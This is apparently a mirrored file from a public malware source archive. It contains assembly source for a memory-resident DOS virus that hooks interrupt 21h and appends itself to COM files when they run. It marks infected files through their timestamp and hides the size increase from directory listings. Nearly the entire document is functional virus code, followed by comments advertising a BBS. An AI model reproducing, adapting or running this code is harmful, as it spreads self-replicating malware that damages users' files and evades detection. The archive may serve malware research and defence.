mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 09:52:32 +00:00
188 lines
5.6 KiB
NASM
188 lines
5.6 KiB
NASM
;
|
||
;
|
||
;
|
||
org 100h
|
||
|
||
ofs:
|
||
push 100h
|
||
push ax
|
||
push ds
|
||
push es
|
||
mov dx,054h-(ofs/16)
|
||
mov es,dx
|
||
mov ax,es:ofs[0]
|
||
cmp ax,ofs[0]
|
||
je to_host
|
||
|
||
lea si,ofs
|
||
mov di,si
|
||
mov cx,virlength
|
||
rep movsb
|
||
|
||
mov ds,es
|
||
mov ax,3521h
|
||
int 21h
|
||
mov word ptr ds:old21[0],bx
|
||
mov word ptr ds:old21[2],es
|
||
|
||
mov ax,2521h
|
||
lea dx,new21
|
||
int 21h
|
||
|
||
to_host: pop es
|
||
pop ds
|
||
mov di,0fe00h
|
||
lea si,relocator
|
||
mov cx,rellength
|
||
rep movsb
|
||
jmp 0fe00h
|
||
|
||
old21 dd 0
|
||
|
||
relocator:
|
||
mov di,100h
|
||
orgofs: lea si,orgp
|
||
mov cx,virlength
|
||
rep movsb
|
||
pop ax
|
||
ret
|
||
|
||
rellength equ $-relocator
|
||
|
||
new21:
|
||
cmp ah,11h
|
||
je findfcb
|
||
cmp ah,12h
|
||
je findfcb
|
||
cmp ah,4eh
|
||
je find
|
||
cmp ah,4fh
|
||
je find
|
||
cmp ax,4b00h
|
||
je exec
|
||
|
||
jmp short dword ptr cs:[old21]
|
||
|
||
getdta:
|
||
pop si
|
||
pushf
|
||
push ax
|
||
push bx
|
||
push es
|
||
mov ah,2fh
|
||
call dos
|
||
jmp short si
|
||
|
||
FindFCB: call DOS ; call orginal interrupt
|
||
cmp al,0 ; error ?
|
||
jne Ret1
|
||
call getdta
|
||
cmp byte ptr es:[bx],-1 ; extended fcb ?
|
||
jne FCBOk
|
||
add bx,8 ; yes, skip 8 bytes
|
||
FCBOk: mov al,es:[bx+16h] ; get file-time (low byte)
|
||
and al,1fh ; seconds
|
||
cmp al,1fh ; 62 seconds ?
|
||
jne FileOk ; no, file not infected
|
||
sub word ptr es:[bx+1ch],Virlength ; adjust file-size
|
||
sbb word ptr es:[bx+1eh],0
|
||
jmp short Time
|
||
|
||
Find: call DOS
|
||
jc Ret1
|
||
call getdta
|
||
mov al,es:[bx+16h]
|
||
and al,1fh
|
||
cmp al,1fh
|
||
jne FileOk
|
||
sub word ptr es:[bx+1ah],VirLength
|
||
sbb word ptr es:[bx+1ch],0
|
||
Time: xor byte ptr es:[bx+16h],10h
|
||
FileOk: pop es
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
Ret1: retf 2
|
||
|
||
exec: push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push ds
|
||
push es
|
||
mov ax,3d02h
|
||
call dos
|
||
mov bx,0bc00h
|
||
mov ds,bx
|
||
mov bh,3fh
|
||
xchg ax,bx
|
||
xor dx,dx
|
||
mov cx,virlength
|
||
call dos
|
||
cmp word ptr ds:[0],'ZM'
|
||
je exe
|
||
cmp word ptr ds:[0],0068h ; push 100
|
||
jne noexe
|
||
exe: mov ah,3eh
|
||
call dos
|
||
pop es
|
||
pop ds
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
jmp short dword ptr cs:[old21]
|
||
|
||
noexe: mov ax,4202h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
call dos
|
||
cmp ax,0fd00h
|
||
jae exe
|
||
cmp ax,virlength+10
|
||
jb exe
|
||
inc ah
|
||
mov word ptr cs:orgofs[1],ax
|
||
|
||
mov ax,5700h
|
||
call dos
|
||
or cx,1fh
|
||
push cx
|
||
push dx
|
||
|
||
mov ah,40h
|
||
xor dx,dx
|
||
mov cx,virlength
|
||
push cx
|
||
call dos
|
||
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
call dos
|
||
|
||
mov ah,40h
|
||
mov ds,cs
|
||
lea dx,ofs
|
||
pop cx
|
||
call dos
|
||
mov ax,5701h
|
||
pop dx
|
||
pop cx
|
||
call dos
|
||
|
||
jmp short exe
|
||
|
||
dos: pushf
|
||
call dword ptr cs:[old21]
|
||
ret
|
||
|
||
virlength equ $-ofs
|
||
|
||
orgp: int 20h
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|